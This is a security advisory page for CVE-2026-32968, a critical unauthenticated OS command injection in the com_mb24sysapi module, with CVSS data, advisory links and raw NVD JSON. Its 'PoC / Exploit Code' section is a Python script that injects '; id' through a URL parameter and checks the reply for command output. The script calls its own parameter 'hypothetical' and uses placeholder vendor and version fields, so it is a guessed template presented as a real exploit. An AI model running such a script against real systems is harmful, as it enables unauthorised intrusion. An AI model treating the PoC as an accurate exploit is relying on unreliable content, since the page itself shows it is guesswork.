Security Vulnerability Report
CVE-2026-32968 CVSS 9.8 CRITICAL

CVE-2026-32968

Published: 2026-03-23 12:16:08
Last Modified: 2026-03-23 14:31:37

Description

Due to the improper neutralisation of special elements used in an OS command, an unauthenticated remote attacker can exploit an RCE vulnerability in the com_mb24sysapi module, resulting in full system compromise. This vulnerability is a variant attack for CVE-2020-10383.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

com_mb24sysapi (for the specific affected versions, refer to the VDE-2026-024 and VDE-2026-025 advisories)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Title: PoC for CVE-2026-32968 (OS Command Injection in com_mb24sysapi)
# Date: 2026-03-23
# Exploit Author: Security Researcher
# Vendor Homepage: Target Vendor
# Version: Vulnerable Versions
# Tested on: Linux/Unix


def exploit(target_url):
    """
    Demonstrates the OS Command Injection vulnerability in com_mb24sysapi.
    """
    # The vulnerable endpoint parameter (hypothetical based on module structure)
    injection_point = "param"
    # Payload to execute 'id' command on the server
    payload = "; id"
    full_url = f"{target_url}/index.php?option=com_mb24sysapi&{injection_point}={payload}"
    try:
        response = requests.get(full_url, timeout=10)
        print(f"[+] Request sent to: {full_url}")
        print(f"[+] Status Code: {response.status_code}")
        print("[+] Response Body:")
        print(response.text)
        if "uid=" in response.text:
            print("[!] Command Injection Successful!")
        else:
            print("[-] Command Injection Failed or output not visible.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    target = input("Enter target URL (e.g., http://localhost): ")
    exploit(target)

References

https://certvde.com/de/advisories/VDE-2026-024
https://certvde.com/de/advisories/VDE-2026-025

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32968", "sourceIdentifier": "[email protected]", "published": "2026-03-23T12:16:08.407", "lastModified": "2026-03-23T14:31:37.267", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to the improper neutralisation of special elements used in an OS command, an unauthenticated remote attacker can exploit an RCE vulnerability in the com_mb24sysapi module, resulting in full system compromise. This vulnerability is a variant attack for CVE-2020-10383."}, {"lang": "es", "value": "Debido a la neutralización incorrecta de elementos especiales utilizados en un comando del SO, un atacante remoto no autenticado puede explotar una vulnerabilidad RCE en el módulo com_mb24sysapi, resultando en un compromiso total del sistema. Esta vulnerabilidad es un ataque variante para CVE-2020-10383."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2026-024", "source": "[email protected]"}, {"url": "https://certvde.com/de/advisories/VDE-2026-025", "source": "[email protected]"}]}}